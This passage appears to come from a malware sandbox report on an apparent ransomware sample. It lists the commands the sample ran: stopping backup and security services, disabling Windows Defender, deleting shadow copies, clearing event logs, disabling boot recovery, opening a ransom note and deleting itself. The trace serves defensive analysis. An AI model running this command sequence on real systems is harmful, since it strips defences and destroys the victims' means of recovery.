388 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 109 PID 2648 wrote to memory of 2848 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 111 PID 2648 wrote to memory of 2848 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 111 PID 2648 wrote to memory of 3684 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 113 PID 2648 wrote to memory of 3684 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 113 PID 2648 wrote to memory of 3436 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 115 PID 2648 wrote to memory of 3436 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 115 PID 2648 wrote to memory of 3972 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 117 PID 2648 wrote to memory of 3972 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 117 PID 2648 wrote to memory of 3004 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 119 PID 2648 wrote to memory of 3004 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 119 PID 2648 wrote to memory of 1784 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 121 PID 2648 wrote to memory of 1784 2648 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe"C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2592
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3776
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:648
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1416
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1636
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:4000
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1060
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2860
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_13263" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_13263" /y3⤵PID:392
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:492
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1716
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:3424
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1120
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:3864
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1160
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1444
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:388
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_13263" start= disabled2⤵PID:2848
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3684
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3436
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3972
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3004
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1784
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1020
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1184
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3520
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3984
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2068
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1104
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3152
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1768
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1332
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:800
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1180
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:368
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2176
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3280
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:4036
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1500
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1492
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:392
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:584
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1280
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:412
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2228
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1400
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2516
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3760
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:784
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2704
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3476
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1948
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1900
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3504
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:780
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3524
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1368
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1300
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3012
-
-
-
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\6pZZ_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2152
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe"2⤵PID:1096
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2588
-
-